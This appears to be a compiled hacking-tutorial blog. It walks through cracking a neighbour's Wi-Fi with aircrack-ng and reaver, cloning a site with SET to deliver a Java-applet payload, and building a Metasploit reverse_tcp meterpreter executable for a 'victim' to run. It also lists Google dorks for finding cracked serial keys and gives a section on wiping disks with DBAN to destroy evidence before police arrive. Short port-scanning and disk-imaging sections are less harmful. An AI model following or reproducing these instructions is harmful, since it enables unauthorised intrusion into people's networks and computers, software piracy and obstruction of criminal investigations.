How I met your neighbor!!!!

There are 2 ways to hack an wireless network both of them require mon0 (monitoring mode) if you are not associated and authenticated to the network(connected).

Things that you might need:-

1. Kali Linux on Vmware.
2. Dlink dw-123.(or any other wireless card that supports monitoring mode)

Dictionary attack:- 

A dictionary attack is a technique for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by trying hundreds or sometimes millions of likely possibilities, such as words in a dictionary.

How to?

1. Open a new terminal in Kali Linux and type airmon-ng start wlan0 and hit enter, here wlan0 can be replaced by interface name of your card.
   
2.  Now type airodump-ng mon0 and hit enter to get the list of networks in your range.
   
3. Now type airodump-ng --bssid target’s bssid -c channel number --write filename mon0 and hit enter to capture the packets of the target router.
   
4. Now on a new terminal window type aireplay-ng -0 5 --ignore-negative-one -a essid  -c cleint essid mon0 to kick the user out and make him to authenticate himself once again which gives us an authentication frame.
   
5. Now press Ctrl+c to stop the first terminal or close both terminals.
6. Now type aircrack-ng -w “path to wordlist” filename.cap and hit enter to crack the hash.

Limitations:-

If you don't have the word in the word-list than you cannot hack the password.

Brute force attack:-
Brute Force Attack aims at being the simplest kind of method to gain access to a site: it tries usernames and passwords, over and over again, until it gets in.

How to?

1. Open a new terminal in Kali Linux and type airmon-ng start wlan0 and hit enter, here wlan0 can be replaced by interface name of your card.
   
2.  Now type airodump-ng mon0 to get the list of networks in your range.
   
3. Now to deploy reaver you will need to type reaver -i mon0  -b bssid -vv and hit enter, after a few minutes or hours you will get the wps key wpa key of the router.
   

Limitation:-

It takes a lot of time to crack the password and requires a stable traffic of the network.

Monitoring mode(mon0)

Introduction:-

Wireless cards have 6 different modes each with it's own functionality:-

1. Managed (Client) 
2. Master (router)
3. Ad-hoc (peer to peer)
4. Mesh (planned ad-hoc)
5. Repeater (WI-FI extender)
6. Monitor 

Monitor mode is a special mode available in some of the wireless cards that allows you to sniff packets which are being sent form the router to the client even when you are not associated and authenticated to the network. You can also use it to authenticate the user who is associated and authenticated to the network. In other words it is like spying on all the networks in your range.

  

How to check your card? 

Open a terminal and type iw phy phy0 info | grep -A8 modes and hit enter. Here phy0 can be replaced with phy1,phy2,phy3,etc depending on your system.To find out this type airmon-ng and hit enter in the terminal.

How to switch it on?

 To enable monitor mode type ifconfig and hit enter on your terminal. It will give you a list of your interfaces list down the wireless interface name in our case it was wlan0. Now type airmon-ng start wlan0 and hit enter to start the monitor mode on your wireless card.

Is it working?

To check if the mon0 interface is working or not type tshark-i mon0 and hit enter.

What is it's use?

This mode is required for all sorts of WI-FI  hacking and sniffing.

Note:-

In our tests and hacks we are using a dlink dw-123 WIFI dongle. 

When cops are at your door step!

When it comes to a cyber crime evidence can decide whether you will end up in a jail or walk out of the case with ease. From our past experience we have learned that just by deleting the files you can't undo what you have done and there are methods and tools to retrieve deleted data. Thus we decide to find out a way to delete everything which can help the investigators to prove you are guilty. DBAN(Darik's Boot and Nuke) is a Linux distribution which is designed to erase all the memory and traces of it from the drive. It is a self-contained boot image that securely wipes the hard disks of most computers. DBAN is appropriate for bulk or emergency data destruction.

How to?

1. Download the ISO file and created a boot-able CD or drive.
2.  Now once you are done Plug the drive or the CD in your PC and restart it.
   
3. Now once DBAN boots up then type autonuke or quick and hit enter.
   
4.  Your disks will be wiped clean.

Note:-

Autonuke will delete the ISO burned on the the disk as well if you are using a pen-drive. You can hit F3 to get the list of all the commands....

Java applet attack with SET

All browsers run  java applet which can be used to gain access to the system. The beauty of such attacks are that the exploit code never touches the disk so such an attack can't be detected by the antivirus. Except Mac all the operating systems are vulnerable to such attacks.

How to?

1. Open the terminal and then type service postgresql start & hit enter and then type service metasploit start & hit enter.
   
2. Now after you are connected then type setoolkit & hit enter.
3. Now select the option 1 and hit enter.
   
4. Now select the option 2 which is website attack vectors and hit enter.
   
5. Now select the option 1 which is the java applet one and hit enter.
   
6. Now hit 2 which is site cloner and enter.And enter your ip address (remember the Ethernet one).
   
7. Now according to your target select your payload and backdoor.
   
8. Now on another terminal type msfconsole and hit enter the type use exploit/multi/handler and hit enter and now set the payload with the set payload command and port and ip with the set command and start the multi listener.
   

Note:- 

When the user goes to the link he/she will be be prompted with a message shown below till he or she clicks install.

Port Scan:The easy way

Port scanning is a technique to scan a system for open ports which can be used for exploitation. This can be considered the first step for hacking. This process can be sometime more technical but we would like you to learn the easy way to do it.

How to?

Android:-

1. In Fing, you can scan the ports just by selecting the host machine and then Service Scan.
   
2. In Landroid, you can select port scan and then entering the ip of the target and then selecting Go.
   
3. In Dsploit, you can select the host then select port scanner.
   

Kali Linux:-

1. Open the terminal then type zenmap (GUI for nmap) and hit enter.
2. Now in the target box type the target's ip and then select the scan type then hit scan.
   

Note:- If the system detects the scan or the port discovery is off then you will not get the results. 

Hacking window machines

Hacking windows computers have always been the first thing which you want to learn when you go into penetration testing as 3 of every 5 computers in the world are running windows on it. We don't intend to harm the reputation of Microsoft but hacking a windows computer that doesn't have any protection from any third party software is quite easy.

What you need?  
Kali Linux on VMware.. 

How to?

1. Open a new terminal window type ifconfig and hit enter. Note down the eth0 IP address.
2. Now type  msfpayload windows/meterpreter/reverse_tcp lhost=ip x > hcak.exe and hit enter. You can change the file name to anything you want instead of hcak.exe. 
   
3. Now type service postgresql start and hit enter then type service metasploit start and hit enter.
   
4. Now type msfconsole and hit enter.
   
5. Now type use exploit/multi/handler and hit enter & after that type set payload windows/meterpreter/reverse_tcp to set the payload for the meterpreter.
   
6. Now set the lhost by typing set lhost ip. And then exploit and hit enter.
7. Now wait tell the victim runs the exe file and then you can connect to the victim.
   

Note:-
If the victim is protected with any fairly good antivirus then this method will fail.

Google Hacks

Google hacks also know as Google dorks are specific keywords which can be used to dig out more details in a regular Google search query.

Now there are millions of such keywords we cannot discuss about each of these posts in a single post. So we will discuss about the most commonly used ones. 

1. inurl: This keyword can be used to find out URL of multiple site having a certain URL query. 
2. filetype: This keyword is used to look for specific file on the net.
   
3. intitle:This keyword is used to find out URL with the specific  word in the title.
   
4.  94fbr This keyword can be used to find serial keys(crack) of a software.
    
   
   

   
   

   
   

   
   

   For more hacks you can refer to the GHDB of exploit-db.com..

   
   

   
   

   
   

   Note:-

   
   

   we are using chrome in our demonstration for optimized results but you can eventually use any browsers as long as it connects to the Google's search engine...

   
   

    

   
   

   
   

Creating a disk image:1st step in digital forensics

A disk image is a virtual image of a storage device which functions like a actual physical drive. It is the first step in digital forensics. In other words you don't what to contaminate the evidence with your shit. This can also be used to recover a complete disk.

How to?
Windows:-

1.  Download Winimage and install it.
2. Run it with administrative privilege and now click OK.
   
3. Now click on disk and then click on "create virtual hard disk image from physical drive".
   
4. Now select your drive and click on OK and select the path of the directory in which you would like to save the disk image..
   
   
   
   

 Linux:-

1. Open a terminal and type fdisk -l and hit enter.
   
2. Now note the drive name.
3. Now type dcfldd if=drive name of=file.dd and hit enter.
   
4. Now type ls and hit enter to see if the file is created or not.  

Note:-
The file created by Winimage has .vhd extension and the file created on Kali Linux has .dd extension. Similarly if you use other programs then the extension may vary. The only thing you need to keep in mind is that you should be sure of the extensions which your forensics tool supports.